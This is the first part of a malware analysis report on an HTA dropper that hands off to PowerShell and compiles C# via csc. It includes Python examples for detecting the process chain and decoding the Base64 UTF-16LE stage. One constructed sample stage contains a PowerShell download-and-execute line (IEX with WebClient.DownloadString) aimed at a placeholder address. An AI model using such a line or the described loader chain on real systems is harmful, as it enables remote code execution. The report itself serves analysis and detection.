Analysis of Malicious Shellcode (HTA as Dropper), Part 1

In this malware analysis report, we follow a piece of shellcode through its delivery chain: from an HTA file to PowerShell, and then from PowerShell to the shellcode itself. Each stage is analyzed in turn to uncover the techniques used to stage and execute the malicious code. Finally, the shellcode is examined in detail and executed in a controlled lab environment to understand its behavior and potential impact. This first part covers the HTA stage and the decoding of the PowerShell it carries.

Graph:


This graph shows the execution chain recorded for the sample. It begins with mshta.exe, the Windows host for HTML Application (HTA) files, which confirms that the initial payload is delivered as an HTA. mshta.exe launches cmd.exe, which in turn launches powershell.exe. PowerShell appears several times in the chain, which is consistent with a staged loader: one instance decodes and runs the next stage, which then spawns another. The conhost.exe entries are Console Host processes; Windows creates one for every console application, so they only confirm that console processes ran and are not an indicator by themselves. Further down the chain PowerShell invokes csc.exe, the C# compiler. This is what happens when a script calls Add-Type with inline C# source: the code is compiled on the fly into a temporary assembly, a common way for PowerShell loaders to obtain the Win32 memory-allocation and thread-creation APIs they need to run shellcode in memory. csc.exe then spawns cvtres.exe (the Resource File To COFF Object Conversion Utility) to embed resources in the assembly it is building; it is a by-product of compilation rather than a separate payload. Taken together, the chain shows a loader built entirely from native Windows tools, with Base64 encoding and repeated hand-offs between interpreters used to evade detection.
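To turn the chain above into something a detection engineer can test, here is an added Python example (not part of the original report) that resolves each process's ancestry from process-creation events and flags interpreters and the compiler when they descend from mshta.exe, while ignoring conhost.exe. The event records, PIDs, paths and rule names are constructed for the example and are not taken from the analyzed sample.

```python
"""Flag the mshta -> cmd -> powershell -> csc -> cvtres chain in process-creation events.

Added example, not part of the original report. The records below are
constructed to resemble Sysmon Event ID 1 data (pid, ppid, image); PIDs,
paths and rule names are assumptions made for illustration.
"""
import ntpath

# Constructed sample events (not taken from the analyzed sample).
EVENTS = [
    {"pid": 100, "ppid": 1,   "image": r"C:\Windows\explorer.exe"},
    {"pid": 200, "ppid": 100, "image": r"C:\Windows\System32\mshta.exe"},
    {"pid": 210, "ppid": 200, "image": r"C:\Windows\System32\cmd.exe"},
    {"pid": 220, "ppid": 210, "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"},
    {"pid": 221, "ppid": 220, "image": r"C:\Windows\System32\conhost.exe"},
    {"pid": 230, "ppid": 220, "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"},
    {"pid": 240, "ppid": 230, "image": r"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe"},
    {"pid": 250, "ppid": 240, "image": r"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe"},
    # Benign noise: an interactive PowerShell started from Explorer.
    {"pid": 300, "ppid": 100, "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"},
]

# Images that matter when they descend from mshta.exe. conhost.exe is left out
# on purpose: Windows attaches one to every console process, so it adds no signal.
MSHTA_CHILDREN_OF_INTEREST = {"cmd.exe", "powershell.exe", "csc.exe", "cvtres.exe"}


def image_name(path):
    """Lower-cased file name of a Windows image path (works on any host OS)."""
    return ntpath.basename(path).lower()


def build_index(events):
    """Map pid -> event so ancestry can be resolved without rescanning the list."""
    return {e["pid"]: e for e in events}


def ancestry(pid, index):
    """Image names from the given process up to the root, e.g. ['csc.exe', 'powershell.exe', ...]."""
    chain, seen = [], set()
    while pid in index and pid not in seen:   # 'seen' guards against pid-reuse loops
        seen.add(pid)
        chain.append(image_name(index[pid]["image"]))
        pid = index[pid]["ppid"]
    return chain


def find_hta_dropper_chains(events):
    """Return one hit per (process, rule) for the two behaviours the graph shows."""
    index = build_index(events)
    hits = []
    for e in events:
        chain = ancestry(e["pid"], index)
        me, ancestors = chain[0], chain[1:]
        # Rule 1: an interpreter or compiler anywhere below mshta.exe.
        if me in MSHTA_CHILDREN_OF_INTEREST and "mshta.exe" in ancestors:
            hits.append({"pid": e["pid"], "rule": "mshta-descendant", "chain": " <- ".join(chain)})
        # Rule 2: PowerShell compiling C# on the fly (Add-Type), however PowerShell was started.
        if me == "csc.exe" and ancestors[:1] == ["powershell.exe"]:
            hits.append({"pid": e["pid"], "rule": "powershell-invokes-csc", "chain": " <- ".join(chain)})
    return hits


if __name__ == "__main__":
    for h in find_hta_dropper_chains(EVENTS):
        print(f"[{h['rule']}] pid={h['pid']}: {h['chain']}")
```

On the constructed events the first rule fires on cmd.exe, both powershell.exe instances, csc.exe and cvtres.exe under mshta.exe, the second rule fires once on csc.exe, and the interactive PowerShell started from Explorer produces nothing.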

Source Code Analysis and Deobfuscation:

The image below shows the sample opened in Notepad++; an .hta file is plain text, so any text editor will do. On inspection, the sample is obfuscated in two distinct ways:

1. Obfuscated variable names: the variable names have been deliberately replaced with meaningless strings, making it harder for an analyst to follow the code. This technique is commonly used to confuse and delay analysis.
2. Base64 encoding: a section of the code is Base64-encoded, a common defense-evasion technique. The encoding hides the true content of the code from a first glance and from simple keyword-based detection.

Both techniques are routinely used by malicious actors to evade detection and analysis; without further decoding, the true purpose and functionality of the file cannot be identified.




To continue with the analysis of this sample, follow these steps:

1. Copy the entire Base64-encoded string: locate the Base64 section in the sample and copy it completely. A truncated string will fail to decode or produce garbage at the end.
2. Decode it with CyberChef: paste the string into CyberChef and apply the "From Base64" operation. CyberChef turns the encoded data back into readable text or code, which gives a clearer view of the functionality embedded in the sample.
3. Read the decoded code: look for commands being executed, files being created or modified, network connections being established, or other suspicious behavior that reveals the nature of the malware.

As shown in the image below, the decoded output is hard to read because of NUL bytes (\x00) between the characters. These are not noise added by the attacker: powershell.exe -EncodedCommand takes the Base64 of UTF-16LE text, and in UTF-16LE every ASCII character is stored as its byte followed by 0x00. There are two ways to clean this up in CyberChef:

1. Apply the "Remove null bytes" operation after "From Base64". This is quick and works when the script is pure ASCII, as it is here.
2. Alternatively, replace the null removal with "Decode text" set to UTF-16LE. This is the correct decoding and is the safer choice when the script contains non-ASCII characters (for example obfuscated identifiers using Unicode letters), because their UTF-16 code units do not contain 0x00 and plain null removal would mangle them.

Once the NUL bytes are gone, the code is readable and you can proceed to identify network connections, file manipulation, or execution of further payloads.

Before the "Remove null bytes" operation:



After applying "Remove null bytes":


After the "Remove null bytes" operation has cleaned up the decoded code, the next step is to copy the entire result into Notepad++ for further analysis:

1. Copy the cleaned code: in CyberChef, select and copy the full output.
2. Paste into Notepad++: open a new document and paste the code. Notepad++ supports syntax highlighting for many languages, which makes the code easier to read.
3. Analyze the code in Notepad++:
   - Use syntax highlighting to make the structure visible.
   - Search for keywords and suspicious functions (for example download, invoke or reflection-related calls) to understand the flow of the code.
   - Use regular expressions to search for encoded strings, URLs or IP addresses.

This gives a deeper understanding of the sample and its intent, which is the basis for the next stage of the analysis.
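The two steps above (decoding the Base64 stage and then searching the result for indicators) can be automated. Below is an added Python example, not the report's own tooling, that Base64-decodes a stage, chooses between UTF-16LE and UTF-8 from the NUL-byte pattern rather than blindly stripping nulls, shows what plain null-stripping does to a non-ASCII character, and then runs the URL and IPv4 regex search from the Notepad++ step. The encoded stage, the address in it (from the 198.51.100.0/24 documentation range) and the regexes are constructed for the example and are not the analyzed sample's payload.

```python
"""Decode a Base64 PowerShell stage and handle its NUL bytes correctly.

Added example, not the report's own tooling. STAGE_PLAINTEXT and the address
in it are constructed for this example (198.51.100.0/24 is a documentation
range); they are not the analyzed sample's payload.
"""
import base64
import re

# powershell.exe -EncodedCommand takes Base64 of UTF-16LE text, so ASCII
# characters come out as <byte> \x00 pairs: that is where the NUL bytes come from.
# The euro sign is included on purpose: its UTF-16LE encoding (AC 20) has no NUL.
STAGE_PLAINTEXT = (
    "$u='http://198.51.100.23/update.txt';"
    "IEX (New-Object Net.WebClient).DownloadString($u);"
    "$tag='€'"
)
STAGE_B64 = base64.b64encode(STAGE_PLAINTEXT.encode("utf-16-le")).decode("ascii")

# A second constructed stage whose bytes are plain ASCII (no NULs at all).
ASCII_B64 = base64.b64encode(b"Write-Host 'hello'").decode("ascii")


def decode_stage(b64):
    """Base64-decode, then pick UTF-16LE or UTF-8 from the NUL pattern.

    Returns (text, encoding_used). In UTF-16LE every ASCII character has a
    0x00 high byte, so NULs in most odd positions mean UTF-16LE.
    """
    raw = base64.b64decode(b64)
    high_bytes = raw[1::2]
    if high_bytes and high_bytes.count(0) > len(high_bytes) // 2:
        return raw.decode("utf-16-le"), "utf-16-le"
    return raw.decode("utf-8", errors="replace"), "utf-8"


def strip_nulls(b64):
    """What 'Remove null bytes' does: drop every 0x00 and show the rest as-is."""
    return base64.b64decode(b64).replace(b"\x00", b"").decode("latin-1")


# The regex search step from the Notepad++ workflow, as patterns (assumed, not from the report).
IOC_PATTERNS = {
    "url": re.compile(r"https?://[^\s'\"<>()]+"),
    "ipv4": re.compile(r"\b(?:\d{1,3}\.){3}\d{1,3}\b"),
}


def extract_iocs(text):
    """Return sorted, de-duplicated matches for each IOC pattern."""
    return {name: sorted(set(p.findall(text))) for name, p in IOC_PATTERNS.items()}


if __name__ == "__main__":
    text, enc = decode_stage(STAGE_B64)
    print(f"decoded as {enc}: {text}")
    print(f"null-stripping instead gives: {strip_nulls(STAGE_B64)!r}")
    print(extract_iocs(text))
```

Run stand-alone, the script recovers the plaintext exactly via UTF-16LE, while the null-stripping path keeps the ASCII part intact but turns the euro sign into two stray bytes, which is the failure mode to keep in mind when a decoded script contains non-ASCII identifiers.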

The decoded code as shown in Notepad++:


